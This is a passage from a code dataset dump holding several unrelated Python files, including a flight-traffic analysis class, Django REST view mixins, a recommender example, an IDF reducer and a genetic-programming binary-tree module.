RDD[(id_sample, RegRecord)]\n","sub_path":"gmql/dataset/loaders/RegLoaderRDD.py","file_name":"RegLoaderRDD.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"503836597","text":"# fmt: off\n\nimport logging\nimport warnings\nfrom concurrent.futures import ProcessPoolExecutor, as_completed\nfrom datetime import timedelta\nfrom functools import lru_cache\nfrom pathlib import Path\nfrom typing import (TYPE_CHECKING, Any, Callable, Dict, Iterable, Iterator,\n List, Optional, Set, Tuple, Type, TypeVar, Union, overload)\n\nimport pandas as pd\nimport pyproj\nfrom cartopy import crs\nfrom cartopy.mpl.geoaxes import GeoAxesSubplot\nfrom tqdm.autonotebook import tqdm\n\nfrom ..core.time import time_or_delta, timelike, to_datetime\nfrom .flight import Flight\nfrom .mixins import GeographyMixin\nfrom .sv import StateVectors\n\nif TYPE_CHECKING:\n from .airspace import Airspace # noqa: F401\n from ..algorithms.cpa import CPA # noqa: F401\n\n# fmt: on\n\n# https://github.com/python/mypy/issues/2511\nTrafficTypeVar = TypeVar(\"TrafficTypeVar\", bound=\"Traffic\")\n\n\nclass Traffic(GeographyMixin):\n\n __slots__ = (\"data\",)\n\n _parse_extension: Dict[str, Callable[..., pd.DataFrame]] = dict()\n\n @classmethod\n def from_flights(cls, flights: Iterable[Optional[Flight]]) -> \"Traffic\":\n cumul = [f.data for f in flights if f is not None]\n if len(cumul) == 0:\n raise ValueError(\"empty traffic\")\n return cls(pd.concat(cumul, sort=False))\n\n @classmethod\n def from_file(\n cls: Type[TrafficTypeVar], filename: Union[Path, str], **kwargs\n ) -> Optional[TrafficTypeVar]:\n\n tentative = super().from_file(filename)\n\n if tentative is not None:\n rename_columns = {\n \"time\": \"timestamp\",\n \"lat\": \"latitude\",\n \"lon\": \"longitude\",\n # speeds\n \"velocity\": \"groundspeed\",\n \"ground_speed\": \"groundspeed\",\n \"ias\": \"IAS\",\n \"tas\": \"TAS\",\n \"mach\": \"Mach\",\n # vertical rate\n \"vertrate\": \"vertical_rate\",\n \"vertical_speed\": \"vertical_rate\",\n \"roc\": \"vertical_rate\",\n # let's just make baroaltitude the altitude by default\n \"baro_altitude\": \"altitude\",\n \"baroaltitude\": \"altitude\",\n \"geo_altitude\": \"geoaltitude\",\n }\n\n if (\n \"baroaltitude\" in tentative.data.columns\n or \"baro_altitude\" in tentative.data.columns\n ):\n # for retrocompatibility\n rename_columns[\"altitude\"] = \"geoaltitude\"\n\n return tentative.rename(columns=rename_columns)\n\n path = Path(filename)\n method = cls._parse_extension.get(\"\".join(path.suffixes), None)\n if method is None:\n logging.warn(f\"{path.suffixes} extension is not supported\")\n return None\n\n data = method(filename, **kwargs)\n if data is None:\n return None\n\n return cls(data)\n\n # --- Special methods ---\n\n def __add__(self, other) -> \"Traffic\":\n # useful for compatibility with sum() function\n if other == 0:\n return self\n return self.__class__(pd.concat([self.data, other.data], sort=False))\n\n def __radd__(self, other) -> \"Traffic\":\n return self + other\n\n @overload\n def __getitem__(self, index: str) -> Optional[Flight]:\n ...\n\n # TODO Iterable[str] would be more appropriate but it overlaps with str\n @overload # noqa: F811\n def __getitem__(\n self, index: Union[List[str], Set[str]]\n ) -> Optional[\"Traffic\"]:\n ...\n\n def __getitem__(self, index): # noqa: F811\n\n data = self.data # should be useless except in some cornercase\n\n if not isinstance(index, str):\n logging.debug(\"Selecting flights from a list of identifiers\")\n subset = list(index) # noqa: F841\n if \"flight_id\" in self.data.columns:\n return self.__class__(\n self.data.loc[self.data.flight_id.isin(subset)]\n )\n else:\n return self.__class__(\n self.data.loc[self.data.callsign.isin(subset)]\n )\n\n if self.flight_ids is not None:\n data = data[data.flight_id == index]\n if data.shape[0] > 0:\n return Flight(data)\n\n logging.debug(\"Fallbacking to icao24/callsign\")\n\n # if no such index as flight_id or no flight_id column\n try:\n # If the index can be interpreted as an hexa, it is most likely an\n # icao24 address. However some callsigns may look like an icao24.\n # Tie-breaker:\n # - if it starts by 0x, priority goes to the icao24;\n # - if it is in capital letters, priority goes to the callsign\n value16 = int(index, 16) # noqa: F841 (unused value16)\n default_icao24 = True\n if index.startswith(\"0x\"):\n index = index.lower()\n logging.debug(\"Selecting an icao24\")\n data = self.data.loc[self.data.icao24 == index[2:]]\n default_icao24 = False\n if index.isupper():\n logging.debug(\"Selecting a callsign\")\n data = self.data.loc[self.data.callsign == index]\n if data.shape[0] > 0:\n default_icao24 = False\n if default_icao24:\n index = index.lower()\n logging.debug(\"Selecting an icao24\")\n data = self.data.loc[self.data.icao24 == index]\n except ValueError:\n index = index.upper()\n logging.debug(\"Selecting a callsign\")\n data = self.data.loc[self.data.callsign == index]\n\n if data.shape[0] > 0:\n return Flight(data)\n\n return None\n\n def _ipython_key_completions_(self) -> Set[str]:\n if self.flight_ids is not None:\n return self.flight_ids\n return {*self.aircraft, *self.callsigns}\n\n def __iter__(self) -> Iterator[Flight]:\n if self.flight_ids is not None:\n for _, df in self.data.groupby(\"flight_id\"):\n yield Flight(df)\n else:\n for _, df in self.data.groupby([\"icao24\", \"callsign\"]):\n yield from Flight(df).split(\"10 minutes\")\n\n def __len__(self):\n return sum(1 for _ in self)\n\n def __repr__(self) -> str:\n stats = self.stats()\n shape = stats.shape[0]\n if shape > 10:\n # stylers are not efficient on big dataframes...\n stats = stats.head(10)\n return stats.__repr__()\n\n def _repr_html_(self) -> str:\n stats = self.stats()\n shape = stats.shape[0]\n if shape > 10:\n # stylers are not efficient on big dataframes...\n stats = stats.head(10)\n styler = stats.style.bar(align=\"mid\", color=\"#5fba7d\")\n rep = f\"Traffic with {shape} identifiers\"\n return rep + styler._repr_html_()\n\n def filter_if(self, criterion: Callable[[Flight], bool]) -> \"Traffic\":\n return Traffic.from_flights(\n flight for flight in self if criterion(flight)\n )\n\n def subset(self, callsigns: Iterable[str]) -> \"Traffic\":\n warnings.warn(\"Use filter_if instead\", DeprecationWarning)\n if \"flight_id\" in self.data.columns:\n return Traffic.from_flights(\n flight\n for flight in self\n # should not be necessary but for type consistency\n if flight.flight_id is not None\n and flight.flight_id in callsigns\n )\n else:\n return Traffic.from_flights(\n flight\n for flight in self\n if flight.callsign in callsigns # type: ignore\n )\n\n # --- Properties ---\n\n # https://github.com/python/mypy/issues/1362\n @property # type: ignore\n @lru_cache()\n def start_time(self) -> pd.Timestamp:\n return self.data.timestamp.min()\n\n # https://github.com/python/mypy/issues/1362\n @property # type: ignore\n @lru_cache()\n def end_time(self) -> pd.Timestamp:\n return self.data.timestamp.max()\n\n # https://github.com/python/mypy/issues/1362\n @property # type: ignore\n @lru_cache()\n def callsigns(self) -> Set[str]:\n \"\"\"Return only the most relevant callsigns\"\"\"\n sub = self.data.query(\"callsign == callsign\")\n return set(cs for cs in sub.callsign if len(cs) > 3 and \" \" not in cs)\n\n @property\n def aircraft(self) -> Set[str]:\n return set(self.data.icao24)\n\n @property\n def flight_ids(self) -> Optional[Set[str]]:\n if \"flight_id\" in self.data.columns:\n return set(self.data.flight_id)\n return None\n\n # --- Easy work ---\n\n def at(self, time: Optional[timelike] = None) -> \"StateVectors\":\n if time is not None:\n time = to_datetime(time)\n list_flights = [\n flight.at(time)\n for flight in self\n if flight.start <= time <= flight.stop # type: ignore\n ]\n else:\n list_flights = [flight.at() for flight in self]\n return StateVectors(\n pd.DataFrame.from_records(\n [s for s in list_flights if s is not None]\n ).assign(\n # attribute 'name' refers to the index, i.e. 'timestamp'\n timestamp=[s.name for s in list_flights if s is not None]\n )\n )\n\n def before(self, ts: timelike) -> \"Traffic\":\n return self.between(self.start_time, ts)\n\n def after(self, ts: timelike) -> \"Traffic\":\n return self.between(ts, self.end_time)\n\n def between(self, before: timelike, after: time_or_delta) -> \"Traffic\":\n before = to_datetime(before)\n if isinstance(after, timedelta):\n after = before + after\n else:\n after = to_datetime(after)\n\n # full call is necessary to keep @before and @after as local variables\n # return self.query('@before < timestamp < @after') => not valid\n return self.__class__(self.data.query(\"@before < timestamp < @after\"))\n\n def airborne(self) -> \"Traffic\":\n \"\"\"Returns the airborne part of the Traffic.\n\n The airborne part is determined by null values on the altitude column.\n \"\"\"\n return self.query(\"altitude == altitude\")\n\n @lru_cache()\n def stats(self) -> pd.DataFrame:\n \"\"\"Statistics about flights contained in the structure.\n Useful for a meaningful representation.\n \"\"\"\n key = [\"icao24\", \"callsign\"] if self.flight_ids is None else \"flight_id\"\n return (\n self.data.groupby(key)[[\"timestamp\"]]\n .count()\n .sort_values(\"timestamp\", ascending=False)\n .rename(columns={\"timestamp\": \"count\"})\n )\n\n def assign_id(self) -> \"Traffic\":\n if \"flight_id\" in self.data.columns:\n return self\n return Traffic.from_flights(\n flight.assign(flight_id=f\"{flight.callsign}_{id_:>03}\")\n for id_, flight in enumerate(self)\n )\n\n def filter(\n self,\n strategy: Callable[\n [pd.DataFrame], pd.DataFrame\n ] = lambda x: x.bfill().ffill(),\n **kwargs,\n ) -> \"Traffic\":\n return Traffic.from_flights(\n flight.filter(strategy, **kwargs) for flight in self\n )\n\n def plot(\n self, ax: GeoAxesSubplot, nb_flights: Optional[int] = None, **kwargs\n ) -> None:\n params: Dict[str, Any] = {}\n if sum(1 for _ in zip(range(8), self)) == 8:\n params[\"color\"] = \"#aaaaaa\"\n params[\"linewidth\"] = 1\n params[\"alpha\"] = 0.8\n kwargs = {**params, **kwargs} # precedence of kwargs over params\n for i, flight in enumerate(self):\n if nb_flights is None or i < nb_flights:\n flight.plot(ax, **kwargs)\n\n @property\n def widget(self):\n from ..drawing.ipywidgets import TrafficWidget\n\n return TrafficWidget(self)\n\n def inside_bbox(\n self, bounds: Union[\"Airspace\", Tuple[float, ...]]\n ) -> \"Traffic\":\n # implemented and monkey-patched in airspace.py\n # given here for consistency in types\n raise NotImplementedError\n\n def intersects(self, airspace: \"Airspace\") -> \"Traffic\":\n # implemented and monkey-patched in airspace.py\n # given here for consistency in types\n raise NotImplementedError\n\n # --- Real work ---\n\n def resample(\n self,\n rule: Union[str, int] = \"1s\",\n max_workers: int = 4,\n ) -> \"Traffic\":\n \"\"\"Resamples all trajectories, flight by flight.\n\n `rule` defines the desired sample rate (default: 1s)\n \"\"\"\n\n with ProcessPoolExecutor(max_workers=max_workers) as executor:\n cumul = []\n tasks = {\n executor.submit(flight.resample, rule): flight\n for flight in self\n }\n for future in tqdm(as_completed(tasks), total=len(tasks)):\n cumul.append(future.result())\n\n return self.__class__.from_flights(cumul)\n\n def closest_point_of_approach(\n self,\n lateral_separation: float,\n vertical_separation: float,\n projection: Union[pyproj.Proj, crs.Projection, None] = None,\n round_t: str = \"d\",\n max_workers: int = 4,\n ) -> \"CPA\":\n \"\"\"\n Computes a CPA dataframe for all pairs of trajectories candidates for\n being separated by less than lateral_separation in vertical_separation.\n\n In order to be computed efficiently, the method needs the following\n parameters:\n\n - projection: a first filtering is applied on the bounding boxes of\n trajectories, expressed in meters. You need to provide a decent\n projection able to approximate distances by Euclide formula.\n By default, EuroPP() projection is considered, but a non explicit\n argument will raise a warning.\n\n - round_t: an additional column will be added in the DataFrame to group\n trajectories by relevant time frames. Distance computations will be\n considered only between trajectories flown in the same time frame.\n By default, the 'd' pandas freq parameter is considered, to group\n trajectories by day, but other ways of splitting ('h') may be more\n relevant and impact performance.\n\n - max_workers: distance computations are spread over a given number of\n processors.\n\n \"\"\"\n\n from ..algorithms.cpa import closest_point_of_approach\n\n return closest_point_of_approach(\n self,\n lateral_separation,\n vertical_separation,\n projection,\n round_t,\n max_workers,\n )\n","sub_path":"traffic/core/traffic.py","file_name":"traffic.py","file_ext":"py","file_size_in_byte":14832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"185247984","text":"ai = [1, 2, 3]\nbi = [11.5, 14, 15.5]\n\nn = len(ai)\n\nc1 = n\nc2 = 0\nc3 = 0\nc4 = 0\nc5 = 0\n\n# Calcul des constantes\nfor a, b in zip(ai, bi):\n\tc2 += b ** 2\n\tc3 += 2 * a * b\n\tc4 += 2 * b\n\tc5 += 2 * a\n\n# Recherche du minimum (le seul point critique)\nd = 4 * c1 * c2 - c4 ** 2\ns = (2 * c1 * c3 - c4 * c5) / d\nt = -(c3 * c4 - 2 * c2 * c5) / d\n\nprint(s, t)\n\nfor a, b in zip(ai, bi):\n\tnb = b * s + t\n\tprint(a, nb, abs(a - nb))\n","sub_path":"test/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"548991079","text":"# Copyright 2018 The Cornac Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"Example for Visual Matrix Factorization (VMF)\"\"\"\n\nimport cornac\nfrom cornac.datasets import amazon_clothing\nfrom cornac.data import ImageModality\nfrom cornac.eval_methods import RatioSplit\n\n\n# The necessary data can be loaded as follows\nfeedback = amazon_clothing.load_feedback()\nfeatures, item_ids = amazon_clothing.load_visual_feature()\n\n# Instantiate a ImageModality, it makes it convenient to work with visual auxiliary information\n# For more details, please refer to the tutorial on how to work with auxiliary data\nitem_image_modality = ImageModality(features=features, ids=item_ids, normalized=True)\n\n# Define an evaluation method to split feedback into train and test sets\nratio_split = RatioSplit(\n data=feedback,\n test_size=0.1,\n rating_threshold=0.5,\n exclude_unknowns=True,\n verbose=True,\n item_image=item_image_modality,\n)\n\n# Instantiate VMF\nvmf = cornac.models.VMF(\n k=10,\n d=10,\n n_epochs=100,\n batch_size=100,\n learning_rate=0.001,\n gamma=0.9,\n lambda_u=0.001,\n lambda_v=0.001,\n lambda_p=1.0,\n lambda_e=10.0,\n use_gpu=True,\n verbose=True,\n)\n\n# Instantiate evaluation measures\nrec_100 = cornac.metrics.Recall(k=100)\n\n# Put everything together into an experiment and run it\ncornac.Experiment(eval_method=ratio_split, models=[vmf], metrics=[rec_100]).run()\n","sub_path":"examples/vmf_clothing.py","file_name":"vmf_clothing.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"207984479","text":"#!/usr/bin/env python\n\nfrom itertools import groupby\nfrom operator import itemgetter\nimport sys,pickle\nfrom math import log10\n# from assignment4.reformatter import PageNode\nidf = lambda q_df, doc_num: log10(doc_num/q_df)\nresult = {}\ndata = map(lambda x: x.strip().split('\\t'), sys.stdin)\n\ndata = sorted(data,key= itemgetter(0))\npage_num = 0\nfor term, id in data:\n\tpage_num+=1\nfor k_group, group in groupby(data, itemgetter(0) ): #group by term (doc_id, (word, TITLE_WORD_SCORE))\n\t# total = sum(int(id) for term,id in group)\n\t# print(\"%s\" % (k_group))\n\t# result[k_group] = len( list(group) )\n\tresult[k_group] = idf( len( list(group) ), page_num) \npickle.dump(result , sys.stdout.buffer) \n","sub_path":"assignment4/mr_apps/idf_reducer.py","file_name":"idf_reducer.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"69847634","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 2 21:53:48 2020\n\n@author: adven\n\"\"\"\n\nfrom PIL import Image, ImageOps\nfrom IPython.display import display\nimport numpy as np\n\ndef digitize(array):\n array = array.copy()\n for i in range(len(array)):\n for j in range(len(array[i])):\n color = array[i,j]\n \n if color <= 122:\n array[i,j] = 255\n \n else:\n array[i,j] = 0\n return array\n \n \npath = \"C:\\\\Users\\\\adven\\\\Desktop\\\\Crit. Data\\\\cdv-student\\projects\\placeholder\\Datazine\\datazine-template\\\\assets\\Middle.jpg\"\nimg = Image.open(path)\nimg = img.copy()\ngray_img = ImageOps.grayscale(img)\n\nimg_data = np.asarray(gray_img)\ndigitized = np.asarray(digitize(img_data))\nunique_elements, counts_elements = np.unique(digitized, return_counts=True)\nnew_img = Image.fromarray(digitized)\nnew_img.show()\n\n\n","sub_path":"projects/placeholder/Datazine/datazine-template/scripts/lineDrawingDigitizer.py","file_name":"lineDrawingDigitizer.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"16663335","text":"from django.urls import path\nfrom . import views\n\napp_name = 'blog'\n\nurlpatterns = [\n path('', views.PostListView.as_view(), name= 'all_posts'),\n path('/', views.PostDetailView.as_view(), name='single_post'),\n path('create/', views.PostCreateView.as_view(), name='create_post'),\n path('edite//', views.PostEditeView.as_view(), name='edite_post'),\n path('delete//', views.PostDeleteView.as_view(), name='delete_post'),\n path('comment//', views.add_comment_to_post, name='comment_to_post'),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25903499","text":"import os\n\nfrom metasdk import MetaApp\n\nMETA = MetaApp()\nlog = META.log\n\nos.chdir(os.path.dirname(__file__))\n__DIR__ = os.getcwd() + \"/\"\n\nq = \"\"\"\nSELECT\n channel_name,\n ROUND( COALESCE(SUM(pageviews) / NULLIF(SUM(sessions), 0), 0) , 2) as pv\nFROM adplatform.campaign_avg_depth_stats_report\nWHERE stat_date BETWEEN '2017-08-01' AND '2017-08-31'\nAND system = 'googleAnalytics'\nand client_id=1460\nGROUP BY channel_name\nORDER BY channel_name\n\"\"\"\n\nconfiguration = {\n \"download\": {\n # \"skipHeaders\": True,\n \"dbQuery\": {\n \"command\": q\n }\n }\n}\nMETA.auth_user_id = 10191\nmetaql = META.MetaqlService\nresp = metaql.download_data(configuration, output_file=__DIR__ + 'assets/campaign_sessions_stats_report.tsv')\nlog.info(\"end\")\n","sub_path":"metasdk/examples/metaql/metaql_get_adplatform_campaign_session_stat.py","file_name":"metaql_get_adplatform_campaign_session_stat.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"109953106","text":"\"\"\"\n@Auth:tiannana\n\"\"\"\nimport re\n\nfrom common.apollo import services\nfrom utils.tools.base_test_case import BaseTestCase\nfrom api.http_client_bck import HttpClientBck\nfrom utils.common import get_mysql\nfrom utils.log import LOGGER\n\n\nclass TestBckSpellingList(BaseTestCase):\n\n @classmethod\n def setup_class(cls):\n cls.bck = HttpClientBck()\n cls.mysql = get_mysql()\n cls.setup_data = getattr(cls, \"setup_data\")\n\n @classmethod\n def teardown_class(cls):\n LOGGER.info(\"TestBckSpellingList测试结束\")\n pass\n\n def test_spelling_list(self, data):\n \"\"\"\n desc:获取登录用户spelling体验课列表信息\n step1:请求接口拿到返回信息\n step2:查询数据库\n step3:断言1.2\n \"\"\"\n\n user_id = re.search(\"=(.*?)&\", services.m_token[\"Cookie\"]).group(1)\n print(user_id)\n\n list1 = self.bck.spelling_list(data.pageNum, data.pageSize, data.productId)\n print(list1)\n list_info = self.mysql.query(\"SELECT * FROM xmkp_edu.EDU_CLASSMATE WHERE user_id=344746 AND is_deleted=0\", True)\n print(list_info)\n print(list1.data.courses[0].productRef)\n print(list_info[0].product_ref)\n\n self.assert_equal(list1.data.courses[0].productRef, list_info[0].product_ref,\"product_ref\")\n\n\n\n\n\n","sub_path":"auto_api_project/xmkp-api-test/cases/BCK/test_cases/test_bck_spellinglist.py","file_name":"test_bck_spellinglist.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"595732132","text":"#!/usr/bin/env python\n\nimport sys\nimport subprocess\n\n\ndef main():\n\n _path = sys.argv[1]\n\n subprocess.check_call(['./runme.py', \\\n _path + '3dMap', _path + 'imagery', \\\n _path + 'camera.config', _path + 'GPS.csv', \\\n _path + 'ImageryTimestamp.csv', 'output.csv'])\n\nif __name__ == '__main__':\n main()\n","sub_path":"exec.py","file_name":"exec.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"74025264","text":"# -*- coding:utf8 -*-\n\"\"\"\nCreated on 15-12-26 下午4:37\n@author: FMC\n\n\"\"\"\nfrom __future__ import nested_scopes, generators, division, absolute_import, with_statement, print_function\n\nfrom django.views.generic.base import View\nfrom django.views.generic.edit import BaseFormView\nfrom django.http.response import JsonResponse, HttpResponseRedirect\nfrom django.core.exceptions import ImproperlyConfigured\n\nfrom .base import CommonBaseExtMixin\nfrom .edit import CommonExtFormMixin, DeletionMixin\n\n\nclass RestFulResponseMixin(object):\n \"\"\"\n A mixin that can be response json data\n \"\"\"\n response_class = JsonResponse\n\n def render_to_response(self, context, **response_kwargs):\n return self.response_class(context, **response_kwargs)\n\n\nclass CommonRestFulModelFormMixin(CommonExtFormMixin):\n \"\"\"\n 对ModelFormMixin类的扩展,使其更为通用,并支持Ajax\n \"\"\"\n def form_invalid(self, form):\n context = self.ajax_form_invalid(form)\n return JsonResponse(context)\n\n def form_valid(self, form):\n # We make sure to call the parent's form_valid() method because\n # it might do some processing (in the case of CreateView, it will\n # call form.save() for example).\n self.object = self.form_save(form)\n self.object.__dict__.pop('_state')\n context_data = {\n 'model': self.object._meta.__str__(),\n 'pk': self.object.pk,\n 'fields': self.object.__dict__\n }\n context = self.get_response_data(context_data)\n context['pk'] = self.object.pk\n return JsonResponse(context)\n\n\nclass RestFulDeletionMixin(DeletionMixin):\n \"\"\"\n 支持Ajax的删除mixin\n \"\"\"\n def delete(self, request, *args, **kwargs):\n \"\"\"\n 当请求是ajax时,返回json格式的数据\n \"\"\"\n response = super(RestFulDeletionMixin, self).delete(request, *args, **kwargs)\n if request.is_ajax():\n return JsonResponse({})\n else:\n return response\n\n\nclass MultipleObjectDeletionMixin(DeletionMixin):\n \"\"\"\n 支持多对象删除操作\n \"\"\"\n status = {\n 'result': True,\n 'comment': '',\n 'data': {}\n }\n\n def delete(self, request, *args, **kwargs):\n \"\"\"\n 调用delete(),可批量删除多个对象,并重定向至success_url\n \"\"\"\n\n self.object_list = self.get_queryset()\n success_url = self.get_success_url()\n\n comment = self.get_result_comment()\n\n try:\n self.object_list.delete()\n except:\n self.status['result'] = False\n self.status['comment'] = comment['failure']\n else:\n self.status['result'] = True\n self.status['comment'] = comment['success']\n\n if self.request.is_ajax():\n return JsonResponse(self.status)\n else:\n return HttpResponseRedirect(success_url)\n\n def get_success_url(self):\n if self.success_url:\n return self.success_url\n else:\n raise ImproperlyConfigured(\n \"No URL to redirect to. Provide a success_url.\")\n\n\nclass CommonRestFulView(CommonBaseExtMixin, RestFulResponseMixin, View):\n \"\"\"\n 通用restful api视图\n \"\"\"\n\n\nclass CommonFormRestFulView(CommonExtFormMixin, RestFulResponseMixin, BaseFormView):\n \"\"\"\n 通用restful api视图\n \"\"\"\n\n","sub_path":"omni/libs/django/view/restful_api.py","file_name":"restful_api.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"531233242","text":"#!/usr/bin/python3\n\"\"\"This module contains all of the classes and functions required for a\nbasic symbolic-regression implementation of genetic programming, including\nclasses binary trees and nodes to fill them, recombination and mutation\noperations, and basic data-handling functionality.\n\"\"\"\n\n\nfrom random import sample, random, randint, choice\nfrom pyGP.primitives import pi, e\nfrom math import log2\nfrom copy import deepcopy\n\n\nclass Node(object):\n \"\"\"\"\"\"\n def __init__(self, value, arity):\n if value == \"rand\":\n self.value = str(random()) \n else:\n self.value = value\n\n self.arity = arity\n\n\nclass LinearTree(list):\n def __init__(self):\n pass\n\n\nclass BinaryTree(list):\n \"\"\"\"\"\"\n def __init__(self, primitives, set_dict, contents, depth=None):\n self.primitives = primitives\n self.set_dict = set_dict\n values_provided = (type(contents) == list)\n if values_provided:\n self.size = len(contents)\n self.depth = get_depth(self.size)\n else:\n self.depth = depth\n self.size = 2 ** (self.depth + 1) - 1\n\n self.extend([None]*self.size)\n self.last_level = 2 ** self.depth - 1\n if values_provided:\n for i in range(len(contents)):\n if contents[i] != None:\n self[i] = Node(contents[i], primitives[contents[i]])\n elif contents == 'full':\n self._full(self.size, self.last_level, 0)\n elif contents == 'grow':\n self._grow(self.size, self.last_level, 0)\n\n def get_left_index(self, n):\n return 2 * n + 1\n\n def get_right_index(self, n):\n return 2 * n + 2\n\n def get_parent_index(self, n):\n return int( (n - 1) / 2)\n\n def has_children(self, n):\n if (2 * n + 1) >= len(self) or (self[self.get_left_index(n)] == None\n and self[self.get_right_index(n)]\n == None):\n return False\n else:\n return True\n\n def get_left_child(self, n):\n if self.has_children(n):\n i = self.get_left_index(n)\n return self[i]\n else:\n return None\n\n def get_right_child(self, n):\n if self.has_children(n):\n i = self.get_right_index(n)\n return self[i]\n else:\n return None\n\n def get_parent(self, n):\n return self[self.get_parent_index(n)]\n\n def _full(self, s, m, n):\n \"\"\"Populates the tree using the full method\"\"\"\n if (n < m):\n self[n] = Node(choice(self.set_dict[\"functions\"]), 2)\n self._full(s, m, 2*n+1)\n self._full(s, m, 2*n+2)\n elif (n < s):\n self[n] = Node(choice(self.set_dict[\"terminals\"]), 0)\n\n def _grow(self, s, m, n):\n \"\"\"Populates the tree using the grow method\"\"\"\n\n # somewhere in here is the problem- need to assign a terminal node to 0 if\n # tree has length 1\n\n parent = self.get_parent(n) # this needs to change as well\n if n == 0: #and self.depth >= 1: switch order, do if equal zero and else\n if self.depth >= 1:\n prim = choice(self.set_dict[\"primitives\"])\n elif self.depth == 0:\n prim = choice(self.set_dict[\"terminals\"])\n\n self[n] = Node(prim, self.primitives[prim])\n self._grow(s, m, 2*n+1)\n self._grow(s, m, 2*n+2)\n elif (n < m):\n if parent is None or parent.value not in \\\n self.set_dict[\"functions\"]:\n self[n] = None\n else:\n prim = choice(self.set_dict[\"primitives\"])\n self[n] = Node(prim, self.primitives[prim])\n self._grow(s, m, 2*n+1)\n self._grow(s, m, 2*n+2)\n elif (n < s):\n if parent is None or parent.value not in \\\n self.set_dict[\"functions\"]:\n self[n] = None\n else:\n self[n] = Node(choice(self.set_dict[\"terminals\"]), 0)\n\n def build_program(self, n=0):\n strng = \"\"\n if n < self.size and self[n] != None:\n strng = self[n].value\n left = self.build_program(2*n+1)\n right = self.build_program(2*n+2)\n strng = \"(\" + left + strng + right + \")\"\n\n return strng\n\n def display(self):\n contents = []\n for item in self:\n try:\n contents.append(item.value)\n except AttributeError:\n contents.append(None)\n return contents\n\n def get_rand_terminal(self):\n \"\"\"Returns the index of a random terminal\"\"\"\n try:\n index = randint(0, self.size - 1)\n except RuntimeError:\n print(\"A recursion depth limit exceeded error occurred. The \\\n offending program is:\")\n print(self.display())\n if (self[index] is None) or (self[index].value in\n self.set_dict[\"functions\"]):\n return self.get_rand_terminal()\n\n return index\n\n def get_rand_function(self):\n \"\"\"Returns the index of a random function, or raises an error if tree\n does not contain one\n \"\"\"\n if (self[0] is None) or (self[0].value not in self.set_dict[\"functions\"]):\n raise NodeSelectionError\n\n index = randint(0, self.last_level - 1)\n if (self[index] is None) or (self[index].value not in\n self.set_dict[\"functions\"]):\n return self.get_rand_function()\n\n return index\n\n def get_rand_node(self):\n index = randint(0, self.size-1)\n if self[index] != None:\n return index\n\n return self.get_rand_node()\n\n def get_subtree(self, n, depth=0):\n \"\"\"Retrieves and returns as a list the subtree starting at index n\"\"\"\n if n >= len(self):\n return []\n\n start = n\n stop = (2 ** depth) + n\n subtree = self[start:stop]\n return subtree + self.get_subtree(start*2+1, depth+1)\n\n def _fill_subtree(self, n, subtree, depth=0):\n \"\"\"Takes in a subtree as a list and a starting index n, and\n re-populates the subtree rooted at self[n] with the contents of\n subtree\n \"\"\"\n if n >= self.size:\n return\n\n start = n\n stop = (2 ** depth) + n\n for i in range(start,stop):\n self[i] = subtree.pop(0)\n self._fill_subtree(start*2+1, subtree, depth+1)\n\n def _pad(self, n, subtree):\n \"\"\"Takes in a starting node index n and a subtree as a list, and pads\n the tree if the subtree would extend beyond the deepest level, or the\n subtree if it does not extend down to the tree's deepest level\n \"\"\"\n old = self.get_subtree(n)\n new = subtree\n nodes_in_old = len(old)\n nodes_in_new = len(new)\n\n if nodes_in_new == nodes_in_old:\n return\n\n if nodes_in_new < nodes_in_old:\n new.extend([None]*(int(next_level_size(nodes_in_new))))\n elif nodes_in_new > nodes_in_old:\n self.extend([None]*(int(next_level_size(self.size))))\n self.size = len(self)\n\n self._pad(n, new)\n\n def replace_subtree(self, n, subtree):\n \"\"\"Takes in a subtree and starting node n, and replaces the original\n subtree beginning at node n with the new one\n \"\"\"\n self._pad(n, subtree)\n self._fill_subtree(n, subtree)\n\n\n\"\"\"Error classes\"\"\"\n\n\nclass SingularityError(Exception):\n\n def __init__(self):\n self.msg = 'the function called has a singularity'\n\n def __str__(self):\n return self.msg\n\n\nclass UnfitError(Exception):\n\n def __init__(self):\n self.msg = 'the individual has a fitness score too large to be represented'\n\n def __str__(self):\n return self.msg\n\n\nclass NodeSelectionError(Exception):\n\n def __init__(self):\n self.msg = 'at least one tree does not have any function nodes, \\\nfunction crossover cannot be performed'\n\n def __str__(self):\n return self.msg\n\n\n\"\"\"Functions for working with individual trees\"\"\"\n\n\ndef get_depth(k):\n \"\"\"Takes the size k of a binary tree and returns its depth\"\"\"\n return int(log2(k + 1) - 